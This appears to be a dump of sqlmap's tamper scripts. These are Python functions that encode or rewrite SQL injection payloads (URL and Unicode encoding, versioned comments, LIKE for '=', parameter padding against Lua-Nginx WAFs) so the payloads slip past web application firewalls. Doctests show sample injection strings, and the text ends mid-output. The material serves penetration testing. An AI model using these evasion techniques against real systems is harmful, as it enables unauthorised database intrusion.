    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport string\n\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.LOW\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Double URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %2553%2545%254C%2545%2543%2554)\n\n    Notes:\n        * Useful to bypass some weak web application firewalls that do not double URL-decode the request before processing it through their ruleset\n\n    >>> tamper('SELECT FIELD FROM%20TABLE')\n    '%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'\n    \"\"\"\n\n    retVal = payload\n\n    if payload:\n        retVal = \"\"\n        i = 0\n\n        while i < len(payload):\n            if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:\n                retVal += '%%25%s' % payload[i + 1:i + 3]\n                i += 3\n            else:\n                retVal += '%%25%.2X' % ord(payload[i])\n                i += 1\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/charencode.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport string\n\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.LOWEST\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54)\n\n    Tested against:\n        * Microsoft SQL Server 2005\n        * MySQL 4, 5.0 and 5.5\n        * Oracle 10g\n        * PostgreSQL 8.3, 8.4, 9.0\n\n    Notes:\n        * Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset\n        * The web server will anyway pass the url-decoded version behind, hence it should work against any DBMS\n\n    >>> tamper('SELECT FIELD FROM%20TABLE')\n    '%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'\n    \"\"\"\n\n    retVal = payload\n\n    if payload:\n        retVal = \"\"\n        i = 0\n\n        while i < len(payload):\n            if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:\n                retVal += payload[i:i + 3]\n                i += 3\n            else:\n                retVal += '%%%.2X' % ord(payload[i])\n                i += 1\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/charunicodeencode.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport os\nimport string\n\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.LOWEST\n\ndef dependencies():\n    singleTimeWarnMessage(\"tamper script '%s' is only meant to be run against ASP or ASP.NET web applications\" % os.path.basename(__file__).split(\".\")[0])\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054)\n\n    Requirement:\n        * ASP\n        * ASP.NET\n\n    Tested against:\n        * Microsoft SQL Server 2000\n        * Microsoft SQL Server 2005\n        * MySQL 5.1.56\n        * PostgreSQL 9.0.3\n\n    Notes:\n        * Useful to bypass weak web application firewalls that do not unicode URL-decode the request before processing it through their ruleset\n\n    >>> tamper('SELECT FIELD%20FROM TABLE')\n    '%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'\n    \"\"\"\n\n    retVal = payload\n\n    if payload:\n        retVal = \"\"\n        i = 0\n\n        while i < len(payload):\n            if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:\n                retVal += \"%%u00%s\" % payload[i + 1:i + 3]\n                i += 3\n            else:\n                retVal += '%%u%.4X' % ord(payload[i])\n                i += 1\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/charunicodeescape.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport string\n\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.NORMAL\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \\u0053\\u0045\\u004C\\u0045\\u0043\\u0054)\n\n    Notes:\n        * Useful to bypass weak filtering and/or WAFs in JSON contexes\n\n    >>> tamper('SELECT FIELD FROM TABLE')\n    '\\\\\\\\u0053\\\\\\\\u0045\\\\\\\\u004C\\\\\\\\u0045\\\\\\\\u0043\\\\\\\\u0054\\\\\\\\u0020\\\\\\\\u0046\\\\\\\\u0049\\\\\\\\u0045\\\\\\\\u004C\\\\\\\\u0044\\\\\\\\u0020\\\\\\\\u0046\\\\\\\\u0052\\\\\\\\u004F\\\\\\\\u004D\\\\\\\\u0020\\\\\\\\u0054\\\\\\\\u0041\\\\\\\\u0042\\\\\\\\u004C\\\\\\\\u0045'\n    \"\"\"\n\n    retVal = payload\n\n    if payload:\n        retVal = \"\"\n        i = 0\n\n        while i < len(payload):\n            if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:\n                retVal += \"\\\\u00%s\" % payload[i + 1:i + 3]\n                i += 3\n            else:\n                retVal += '\\\\u%.4X' % ord(payload[i])\n                i += 1\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/commalesslimit.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport os\nimport re\n\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.HIGH\n\ndef dependencies():\n    singleTimeWarnMessage(\"tamper script '%s' is only meant to be run against %s\" % (os.path.basename(__file__).split(\".\")[0], DBMS.MYSQL))\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces (MySQL) instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' counterpart\n\n    Requirement:\n        * MySQL\n\n    Tested against:\n        * MySQL 5.0 and 5.5\n\n    >>> tamper('LIMIT 2, 3')\n    'LIMIT 3 OFFSET 2'\n    \"\"\"\n\n    retVal = payload\n\n    match = re.search(r\"(?i)LIMIT\\s*(\\d+),\\s*(\\d+)\", payload or \"\")\n    if match:\n        retVal = retVal.replace(match.group(0), \"LIMIT %s OFFSET %s\" % (match.group(2), match.group(1)))\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/commalessmid.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport os\nimport re\n\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.HIGH\n\ndef dependencies():\n    singleTimeWarnMessage(\"tamper script '%s' is only meant to be run against %s\" % (os.path.basename(__file__).split(\".\")[0], DBMS.MYSQL))\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces (MySQL) instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' counterpart\n\n    Requirement:\n        * MySQL\n\n    Tested against:\n        * MySQL 5.0 and 5.5\n\n    >>> tamper('MID(VERSION(), 1, 1)')\n    'MID(VERSION() FROM 1 FOR 1)'\n    \"\"\"\n\n    retVal = payload\n\n    warnMsg = \"you should consider usage of switch '--no-cast' along with \"\n    warnMsg += \"tamper script '%s'\" % os.path.basename(__file__).split(\".\")[0]\n    singleTimeWarnMessage(warnMsg)\n\n    match = re.search(r\"(?i)MID\\((.+?)\\s*,\\s*(\\d+)\\s*\\,\\s*(\\d+)\\s*\\)\", payload or \"\")\n    if match:\n        retVal = retVal.replace(match.group(0), \"MID(%s FROM %s FOR %s)\" % (match.group(1), match.group(2), match.group(3)))\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/commentbeforeparentheses.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.NORMAL\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Prepends (inline) comment before parentheses (e.g. ( -> /**/()\n\n    Tested against:\n        * Microsoft SQL Server\n        * MySQL\n        * Oracle\n        * PostgreSQL\n\n    Notes:\n        * Useful to bypass web application firewalls that block usage\n          of function calls\n\n    >>> tamper('SELECT ABS(1)')\n    'SELECT ABS/**/(1)'\n    \"\"\"\n\n    retVal = payload\n\n    if payload:\n        retVal = re.sub(r\"\\b(\\w+)\\(\", r\"\\g<1>/**/(\", retVal)\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/concat2concatws.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport os\n\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.HIGHEST\n\ndef dependencies():\n    singleTimeWarnMessage(\"tamper script '%s' is only meant to be run against %s\" % (os.path.basename(__file__).split(\".\")[0], DBMS.MYSQL))\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces (MySQL) instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' counterpart\n\n    Requirement:\n        * MySQL\n\n    Tested against:\n        * MySQL 5.0\n\n    Notes:\n        * Useful to bypass very weak and bespoke web application firewalls\n          that filter the CONCAT() function\n\n    >>> tamper('CONCAT(1,2)')\n    'CONCAT_WS(MID(CHAR(0),0,0),1,2)'\n    \"\"\"\n\n    if payload:\n        payload = payload.replace(\"CONCAT(\", \"CONCAT_WS(MID(CHAR(0),0,0),\")\n\n    return payload\n"
  },
  {
    "path": "sqlmap/tamper/dunion.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport os\nimport re\n\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.HIGHEST\n\ndef dependencies():\n    singleTimeWarnMessage(\"tamper script '%s' is only meant to be run against %s\" % (os.path.basename(__file__).split(\".\")[0], DBMS.ORACLE))\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces instances of <int> UNION with <int>DUNION\n\n    Requirement:\n        * Oracle\n\n    Notes:\n        * Reference: https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf\n\n    >>> tamper('1 UNION ALL SELECT')\n    '1DUNION ALL SELECT'\n    \"\"\"\n\n    return re.sub(r\"(?i)(\\d+)\\s+(UNION )\", r\"\\g<1>D\\g<2>\", payload) if payload else payload\n"
  },
  {
    "path": "sqlmap/tamper/equaltolike.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.HIGHEST\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces all occurrences of operator equal ('=') with 'LIKE' counterpart\n\n    Tested against:\n        * Microsoft SQL Server 2005\n        * MySQL 4, 5.0 and 5.5\n\n    Notes:\n        * Useful to bypass weak and bespoke web application firewalls that\n          filter the equal character ('=')\n        * The LIKE operator is SQL standard. Hence, this tamper script\n          should work against all (?) databases\n\n    >>> tamper('SELECT * FROM users WHERE id=1')\n    'SELECT * FROM users WHERE id LIKE 1'\n    \"\"\"\n\n    retVal = payload\n\n    if payload:\n        retVal = re.sub(r\"\\s*=\\s*\", \" LIKE \", retVal)\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/equaltorlike.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.HIGHEST\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces all occurrences of operator equal ('=') with 'RLIKE' counterpart\n\n    Tested against:\n        * MySQL 4, 5.0 and 5.5\n\n    Notes:\n        * Useful to bypass weak and bespoke web application firewalls that\n          filter the equal character ('=')\n\n    >>> tamper('SELECT * FROM users WHERE id=1')\n    'SELECT * FROM users WHERE id RLIKE 1'\n    \"\"\"\n\n    retVal = payload\n\n    if payload:\n        retVal = re.sub(r\"\\s*=\\s*\", \" RLIKE \", retVal)\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/escapequotes.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.NORMAL\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Slash escape single and double quotes (e.g. ' -> \\')\n\n    >>> tamper('1\" AND SLEEP(5)#')\n    '1\\\\\\\\\" AND SLEEP(5)#'\n    \"\"\"\n\n    return payload.replace(\"'\", \"\\\\'\").replace('\"', '\\\\\"')\n"
  },
  {
    "path": "sqlmap/tamper/greatest.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.HIGHEST\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces greater than operator ('>') with 'GREATEST' counterpart\n\n    Tested against:\n        * MySQL 4, 5.0 and 5.5\n        * Oracle 10g\n        * PostgreSQL 8.3, 8.4, 9.0\n\n    Notes:\n        * Useful to bypass weak and bespoke web application firewalls that\n          filter the greater than character\n        * The GREATEST clause is a widespread SQL command. Hence, this\n          tamper script should work against majority of databases\n\n    >>> tamper('1 AND A > B')\n    '1 AND GREATEST(A,B+1)=A'\n    \"\"\"\n\n    retVal = payload\n\n    if payload:\n        match = re.search(r\"(?i)(\\b(AND|OR)\\b\\s+)([^>]+?)\\s*>\\s*(\\w+|'[^']+')\", payload)\n\n        if match:\n            _ = \"%sGREATEST(%s,%s+1)=%s\" % (match.group(1), match.group(3), match.group(4), match.group(3))\n            retVal = retVal.replace(match.group(0), _)\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/halfversionedmorekeywords.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport os\nimport re\n\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.data import kb\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import PRIORITY\nfrom lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS\n\n__priority__ = PRIORITY.HIGHER\n\ndef dependencies():\n    singleTimeWarnMessage(\"tamper script '%s' is only meant to be run against %s < 5.1\" % (os.path.basename(__file__).split(\".\")[0], DBMS.MYSQL))\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Adds (MySQL) versioned comment before each keyword\n\n    Requirement:\n        * MySQL < 5.1\n\n    Tested against:\n        * MySQL 4.0.18, 5.0.22\n\n    Notes:\n        * Useful to bypass several web application firewalls when the\n          back-end database management system is MySQL\n        * Used during the ModSecurity SQL injection challenge,\n          http://modsecurity.org/demo/challenge.html\n\n    >>> tamper(\"value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa\")\n    \"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa\"\n    \"\"\"\n\n    def process(match):\n        word = match.group('word')\n        if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS:\n            return match.group().replace(word, \"/*!0%s\" % word)\n        else:\n            return match.group()\n\n    retVal = payload\n\n    if payload:\n        retVal = re.sub(r\"(?<=\\W)(?P<word>[A-Za-z_]+)(?=\\W|\\Z)\", process, retVal)\n        retVal = retVal.replace(\" /*!0\", \"/*!0\")\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/hex2char.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport os\nimport re\n\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.convert import decodeHex\nfrom lib.core.convert import getOrds\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.NORMAL\n\ndef dependencies():\n    singleTimeWarnMessage(\"tamper script '%s' is only meant to be run against %s\" % (os.path.basename(__file__).split(\".\")[0], DBMS.MYSQL))\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces each (MySQL) 0x<hex> encoded string with equivalent CONCAT(CHAR(),...) counterpart\n\n    Requirement:\n        * MySQL\n\n    Tested against:\n        * MySQL 4, 5.0 and 5.5\n\n    Notes:\n        * Useful in cases when web application does the upper casing\n\n    >>> tamper('SELECT 0xdeadbeef')\n    'SELECT CONCAT(CHAR(222),CHAR(173),CHAR(190),CHAR(239))'\n    \"\"\"\n\n    retVal = payload\n\n    if payload:\n        for match in re.finditer(r\"\\b0x([0-9a-f]+)\\b\", retVal):\n            if len(match.group(1)) > 2:\n                result = \"CONCAT(%s)\" % ','.join(\"CHAR(%d)\" % _ for _ in getOrds(decodeHex(match.group(1))))\n            else:\n                result = \"CHAR(%d)\" % ord(decodeHex(match.group(1)))\n            retVal = retVal.replace(match.group(0), result)\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/htmlencode.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.LOW\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    HTML encode (using code points) all non-alphanumeric characters (e.g. ' -> &#39;)\n\n    >>> tamper(\"1' AND SLEEP(5)#\")\n    '1&#39;&#32;AND&#32;SLEEP&#40;5&#41;&#35;'\n    \"\"\"\n\n    return re.sub(r\"[^\\w]\", lambda match: \"&#%d;\" % ord(match.group(0)), payload) if payload else payload\n"
  },
  {
    "path": "sqlmap/tamper/ifnull2casewhenisnull.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'doc/COPYING' for copying permission\n\"\"\"\n\nfrom lib.core.compat import xrange\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.HIGHEST\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces instances like 'IFNULL(A, B)' with 'CASE WHEN ISNULL(A) THEN (B) ELSE (A) END' counterpart\n\n    Requirement:\n        * MySQL\n        * SQLite (possibly)\n        * SAP MaxDB (possibly)\n\n    Tested against:\n        * MySQL 5.0 and 5.5\n\n    Notes:\n        * Useful to bypass very weak and bespoke web application firewalls\n          that filter the IFNULL() functions\n\n    >>> tamper('IFNULL(1, 2)')\n    'CASE WHEN ISNULL(1) THEN (2) ELSE (1) END'\n    \"\"\"\n\n    if payload and payload.find(\"IFNULL\") > -1:\n        while payload.find(\"IFNULL(\") > -1:\n            index = payload.find(\"IFNULL(\")\n            depth = 1\n            comma, end = None, None\n\n            for i in xrange(index + len(\"IFNULL(\"), len(payload)):\n                if depth == 1 and payload[i] == ',':\n                    comma = i\n\n                elif depth == 1 and payload[i] == ')':\n                    end = i\n                    break\n\n                elif payload[i] == '(':\n                    depth += 1\n\n                elif payload[i] == ')':\n                    depth -= 1\n\n            if comma and end:\n                _ = payload[index + len(\"IFNULL(\"):comma]\n                __ = payload[comma + 1:end].lstrip()\n                newVal = \"CASE WHEN ISNULL(%s) THEN (%s) ELSE (%s) END\" % (_, __, _)\n                payload = payload[:index] + newVal + payload[end + 1:]\n            else:\n                break\n\n    return payload\n"
  },
  {
    "path": "sqlmap/tamper/ifnull2ifisnull.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.compat import xrange\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.HIGHEST\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' counterpart\n\n    Requirement:\n        * MySQL\n        * SQLite (possibly)\n        * SAP MaxDB (possibly)\n\n    Tested against:\n        * MySQL 5.0 and 5.5\n\n    Notes:\n        * Useful to bypass very weak and bespoke web application firewalls\n          that filter the IFNULL() function\n\n    >>> tamper('IFNULL(1, 2)')\n    'IF(ISNULL(1),2,1)'\n    \"\"\"\n\n    if payload and payload.find(\"IFNULL\") > -1:\n        while payload.find(\"IFNULL(\") > -1:\n            index = payload.find(\"IFNULL(\")\n            depth = 1\n            comma, end = None, None\n\n            for i in xrange(index + len(\"IFNULL(\"), len(payload)):\n                if depth == 1 and payload[i] == ',':\n                    comma = i\n\n                elif depth == 1 and payload[i] == ')':\n                    end = i\n                    break\n\n                elif payload[i] == '(':\n                    depth += 1\n\n                elif payload[i] == ')':\n                    depth -= 1\n\n            if comma and end:\n                _ = payload[index + len(\"IFNULL(\"):comma]\n                __ = payload[comma + 1:end].lstrip()\n                newVal = \"IF(ISNULL(%s),%s,%s)\" % (_, __, _)\n                payload = payload[:index] + newVal + payload[end + 1:]\n            else:\n                break\n\n    return payload\n"
  },
  {
    "path": "sqlmap/tamper/informationschemacomment.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.NORMAL\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Add an inline comment (/**/) to the end of all occurrences of (MySQL) \"information_schema\" identifier\n\n    >>> tamper('SELECT table_name FROM INFORMATION_SCHEMA.TABLES')\n    'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES'\n    \"\"\"\n\n    retVal = payload\n\n    if payload:\n        retVal = re.sub(r\"(?i)(information_schema)\\.\", r\"\\g<1>/**/.\", payload)\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/least.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.HIGHEST\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces greater than operator ('>') with 'LEAST' counterpart\n\n    Tested against:\n        * MySQL 4, 5.0 and 5.5\n        * Oracle 10g\n        * PostgreSQL 8.3, 8.4, 9.0\n\n    Notes:\n        * Useful to bypass weak and bespoke web application firewalls that\n          filter the greater than character\n        * The LEAST clause is a widespread SQL command. Hence, this\n          tamper script should work against majority of databases\n\n    >>> tamper('1 AND A > B')\n    '1 AND LEAST(A,B+1)=B+1'\n    \"\"\"\n\n    retVal = payload\n\n    if payload:\n        match = re.search(r\"(?i)(\\b(AND|OR)\\b\\s+)([^>]+?)\\s*>\\s*(\\w+|'[^']+')\", payload)\n\n        if match:\n            _ = \"%sLEAST(%s,%s+1)=%s+1\" % (match.group(1), match.group(3), match.group(4), match.group(4))\n            retVal = retVal.replace(match.group(0), _)\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/lowercase.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.data import kb\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.NORMAL\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    Replaces each keyword character with lower case value (e.g. SELECT -> select)\n\n    Tested against:\n        * Microsoft SQL Server 2005\n        * MySQL 4, 5.0 and 5.5\n        * Oracle 10g\n        * PostgreSQL 8.3, 8.4, 9.0\n\n    Notes:\n        * Useful to bypass very weak and bespoke web application firewalls\n          that has poorly written permissive regular expressions\n\n    >>> tamper('INSERT')\n    'insert'\n    \"\"\"\n\n    retVal = payload\n\n    if payload:\n        for match in re.finditer(r\"\\b[A-Za-z_]+\\b\", retVal):\n            word = match.group()\n\n            if word.upper() in kb.keywords:\n                retVal = retVal.replace(word, word.lower())\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/tamper/luanginx.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport random\nimport string\n\nfrom lib.core.compat import xrange\nfrom lib.core.enums import HINT\nfrom lib.core.enums import PRIORITY\nfrom lib.core.settings import DEFAULT_GET_POST_DELIMITER\n\n__priority__ = PRIORITY.NORMAL\n\ndef tamper(payload, **kwargs):\n    \"\"\"\n    LUA-Nginx WAFs Bypass (e.g. Cloudflare)\n\n    Reference:\n        * https://opendatasecurity.io/cloudflare-vulnerability-allows-waf-be-disabled/\n\n    Notes:\n        * Lua-Nginx WAFs do not support processing of more than 100 parameters\n\n    >>> random.seed(0); hints={}; payload = tamper(\"1 AND 2>1\", hints=hints); \"%s&%s\" % (hints[HINT.PREPEND], payload)\n    '34=&Xe=&90=&Ni=&rW=&lc=&te=&T4=&zO=&NY=&B4=&hM=&X2=&pU=&D8=&hm=&p0=&7y=&18=&RK=&Xi=&5M=&vM=&hO=&bg=&5c=&b8=&dE=&7I=&5I=&90=&R2=&BK=&bY=&p4=&lu=&po=&Vq=&bY=&3c=&ps=&Xu=&lK=&3Q=&7s=&pq=&1E=&rM=&FG=&vG=&Xy=&tQ=&lm=&rO=&pO=&rO=&1M=&vy=&La=&xW=&f8=&du=&94=&vE=&9q=&bE=&lQ=&JS=&NQ=&fE=&RO=&FI=&zm=&5A=&lE=&DK=&x8=&RQ=&Xw=&LY=&5S=&zi=&Js=&la=&3I=&r8=&re=&Xe=&5A=&3w=&vs=&zQ=&1Q=&HW=&Bw=&Xk=&LU=&Lk=&1E=&Nw=&pm=&ns=&zO=&xq=&7k=&v4=&F6=&Pi=&vo=&zY=&vk=&3w=&tU=&nW=&TG=&NM=&9U=&p4=&9A=&T8=&Xu=&xa=&Jk=&nq=&La=&lo=&zW=&xS=&v0=&Z4=&vi=&Pu=&jK=&DE=&72=&fU=&DW=&1g=&RU=&Hi=&li=&R8=&dC=&nI=&9A=&tq=&1w=&7u=&rg=&pa=&7c=&zk=&rO=&xy=&ZA=&1K=&ha=&tE=&RC=&3m=&r2=&Vc=&B6=&9A=&Pk=&Pi=&zy=&lI=&pu=&re=&vS=&zk=&RE=&xS=&Fs=&x8=&Fe=&rk=&Fi=&Tm=&fA=&Zu=&DS=&No=&lm=&lu=&li=&jC=&Do=&Tw=&xo=&zQ=&nO=&ng=&nC=&PS=&fU=&Lc=&Za=&Ta=&1y=&lw=&pA=&ZW=&nw=&pM=&pa=&Rk=&lE=&5c=&T4=&Vs=&7W=&Jm=&xG=&nC=&Js=&xM=&Rg=&zC=&Dq=&VA=&Vy=&9o=&7o=&Fk=&Ta=&Fq=&9y=&vq=&rW=&X4=&1W=&hI=&nA=&hs=&He=&No=&vy=&9C=&ZU=&t6=&1U=&1Q=&Do=&bk=&7G=&nA=&VE=&F0=&BO=&l2=&BO=&7o=&zq=&B4=&fA=&lI=&Xy=&Ji=&lk=&7M=&JG=&Be=&ts=&